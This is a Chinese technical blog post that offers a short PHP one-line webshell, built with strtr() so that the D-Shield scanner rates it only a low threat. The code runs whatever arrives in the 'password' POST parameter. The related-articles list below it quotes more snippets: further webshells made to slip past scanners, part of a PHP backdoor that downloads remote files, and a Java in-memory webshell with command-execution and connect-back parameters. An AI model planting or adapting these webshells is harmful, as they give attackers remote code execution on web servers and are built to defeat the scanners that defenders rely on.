随记(十一):记录一个1级webshell

最新推荐文章于 2025-08-06 09:37:52 发布
原创 最新推荐文章于 2025-08-06 09:37:52 发布 · 294 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #渗透测试 #shell

本文介绍了一种通过使用简单的strtr()函数来优化PHP一句话木马的方法,该方法能够有效减少被安全软件检测到的风险。经过优化后的木马代码在D盾中仅被标记为1级威胁。

PHP一句话,谈不上免杀,D盾只报1级,安全狗没测试过,只是用了简单的strtr()函数进行优化,不喜勿喷。

<?php 
    $a = strtr('azxcvt','zxcv','sser');
    $a($_POST['password']);
?>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

【Settings随记:二】一菜单,二菜单的添加与隐藏,添加辅助功能
镇元子的博客
09-29 1522
首先会去调用父类的onCreatePreferences(Bundle savedInstanceState, String rootKey)方法,然后调用addPreferencesFromResource(R.xml.assistant_function)方法(这个方法是父类的)加载二菜单的xml配置文件,实现创建二菜单,这个配置文件路径在res/xml/assistant_function.xml。controller:该item的控制器,控制它的内容展示,是否可用,也可以控制它的点击事件等。
学习随记1:VMware Fusion上对Windows Xp系统的磁盘分区操作
weixin_44595637的博客
09-11 1960
MAC系统上的VMware Fusion虚拟机对Windows Xp或Windows Server 2003系统的磁盘分区操作
ATT&CK靶场系列(六)
qq_1873822的博客
12-21 6913
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/8/
28. 实现 strStr()
qq_44116786的博客
03-11 126
实现 strStr() 函数。 给定一个 haystack 字符串和一个 needle 字符串,在 haystack 字符串中找出 needle 字符串出现的第一个位置 (从0开始)。如果不存在,则返回 -1。 示例 1: 输入: haystack = “hello”, needle = “ll” 输出: 2 示例 2: 输入: haystack = “aaaaa”, needle = “bba” 输出: -1 来源:力扣(LeetCode) 链接:https://leetcode-cn.com/prob
在Windows中使用TCP端口139和445
XXR_Beta的博客
06-30 4043
Windows中使用TCP端口139和445139端口和445端口的作用139端口与445端口的区别关闭139端口和445端口的方法 Microsoft在Windows 2000中引入了TCP端口445,并且在Windows 10和Windows Server 2019中仍在使用。我将解释该端口的作用以及与Windows安全性的关系。同时,我还将说明如何禁用旧的TCP端口139。 139端口和445端口的作用 详述139端口,那必须提NBT协议(即Net Bios Over TCP/IP),其属于SMB(S
绕过D盾的php一句话
weixin_30847271的博客
04-23 1034
d_dun.php <?php $a = '小狗狗你好啊'; $b = '小盾盾你好啊'; foreach ($_REQUEST as $key => $value) { $$key = $value; } 注入页插入: <?php include 'd_dun.php'; $b( $a ); 注入页调用: ?b=ass...
php一句话木马的老生常谈,可过D盾,安全狗
zhalang8324的博客
04-19 5948
首发T00ls,原文地址https://www.t00ls.net/thread-45367-1-1.html这边也是才进t00ls,算是一个小小的分享吧。首先是过安全狗,这里讲下怎么一步步过安全狗。首先下面这个马很简单,只用了一个变量覆盖,所以,不出所料被杀了        $b=$_POST['x'];        $a='b';        @assert($$a); 马被杀了那肯定要想...
随记(十):记录有趣的Github项目
XXR_Beta的博客
12-17 235
一款优秀的webshell项目:https://github.com/tennc/webshell 红队技术与技巧:https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques 其文档官网:https://www.ired.team/ 唉,学不完~学不完,后续看到优秀的Github项目也会记录于此。 ...
HTTP协议知识点随记(1)
2301_81058007的博客
08-06 798
安全(不是传统意义上的安全):不会修改服务器状态。(只用于读取数据,不应创建、修改或删除资源,多次调用 = 一次调用效果(且无副作用)安全一定幂等(如:get,head,options,trace),幂等不一定安全(如:put,delete)。请求方法中不安全也不幂等:post,patch,connect。✅ 修复建议:禁用 PUT 方法或配置严格的访问控制。示例:探测是否存在未授权的调试接口。幂等:多次执行结果相同。
linux服务器上使用find查杀webshell木马方法
数据库生态圈(RDB & NoSQL & Bigdata)——专注于关系库优化(Oracle&Mysql&PG&SQL Server )
04-18 786
本文转自:http://ju.outofmemory.cn/entry/256317 只要从事互联网web开发的,都会碰上web站点被入侵的情况。这里我把查杀的一些方法采用随记的形式记录一下,一是方便自己以后的工作需要,二是给其他朋友提供一些参考帮助。写的不周的地方,高手们不要喷,欢迎给我提供更好的意见,对于我个人来说也是个提高,并表示感谢。 我们的服务器环境是linux,所以,肯定少不了用f...
【Qt】随记1:#if 1/0 #else #endif的用法
cqy阳的博客
04-18 2683
随记1:#if 1/0 #else #endif的用法
工作随记3:一次交换机环路故障
weixin_44595637的博客
01-06 2237
1.查看交换机mac漂移,判断是否存在环路; 2.开启交换机邻居功能,并查看邻居;
学习随记:纹波噪声谐波区别
最新发布
09-04
随着电子设备对电源质量要求的提升,对开关电源纹波和噪声的控制已成为电源设计和应用中的一个重要环节。通过科学合理的设计和优化,可以使得开关电源在高效运作的同时,保证输出电压的稳定性和纯净度,从而提升整个...
随记(七):Jboss漏洞检测利用工具
XXR_Beta的博客
12-06 5589
Jboss漏洞检测利用工具0x01 安装方法0x02 使用方法 Jexboss是一个使用Python编写的Jboss漏洞检测利用工具,通过它可以检测并利用web-console,jmx-console,JMXInvokerServlet这三个漏洞,并且可以获得一个shell。 工具下载:https://github.com/joaomatosf/jexboss 此工具除了可以对Jboss框架进行漏洞检测,还可以对其它Java平台、框架、应用等反序列化漏洞进行检测。 0x01 安装方法 ## 克隆项目至本地
随记(六):Suricata IDS 开源入侵检测系统
XXR_Beta的博客
12-05 1359
记录两个Github项目: https://github.com/OISF/suricata https://github.com/suricata-rules/suricata-rules Suricata是一个优秀的开源入侵检测系统,此项目记录安全运营人员提取的高质量Suricata IDS规则。 Suricata IDS Rules 用来检测红队渗透/恶意行为等,支持检测CobaltStrike/MSF/Empire/DNS隧道/Weevely/菜刀/冰蝎/挖矿/反弹shell/ICMP隧道等。 官网
随记(四):简述HSTS协议
XXR_Beta的博客
11-30 810
简述HSTS协议HSTS协议概要HSTS作用HSTS配置方法 HSTS协议概要 HSTS意为严格传输安全协议(英语:HTTP Strict Transport Security),其最为核心的是一个HTTP响应头(HTTP Response Header),正如图所示: HSTS Header的语法如下: Strict-Transport-Security: max-age=XXX; includeSubDomains; preload max-age是必填参数,是一个以秒为单位的数值,它代表着HST
随记(五):一个简单又较隐蔽的PHP后门
XXR_Beta的博客
12-05 707
话不多说,直接上代码(backdoor.php) <?php function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_seto
随记(九):记录Fastjson远程命令执行流程
XXR_Beta的博客
12-08 700
记录Fastjson远程命令执行流程0x01 Fastjson远程命令执行流程0x02 Fastjson漏洞利用流程简述 摘自:ZE0安全实验室的一篇分析文章 - 传送门 我觉得这个解释非常好,所以借此文记录下来。如有冒犯,私信我立即删除。同时还总结了漏洞利用流程的简述,像这个问题,在面试过程中也常常会被提及到,鄙人就有幸被提问过一次,模模糊糊的答出个大概来。 0x01 Fastjson远程命令执行流程 主机A:存在fastjson反序列化漏洞的主机 主机C:为RMI/LDAP服务 主机B:为构造的恶意
随记(二):Java 内存Webshell
XXR_Beta的博客
11-19 486
项目地址:https://github.com/rebeyond/memShell 注入进Java WEB服务器内存中的WebShell anyurl?pass_the_world=pass //show this help page. anyurl?pass_the_world=pass&model=exec&cmd=whoami //run os command. anyurl?pass_the_world=pass&model=connectback&ip=8.8
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值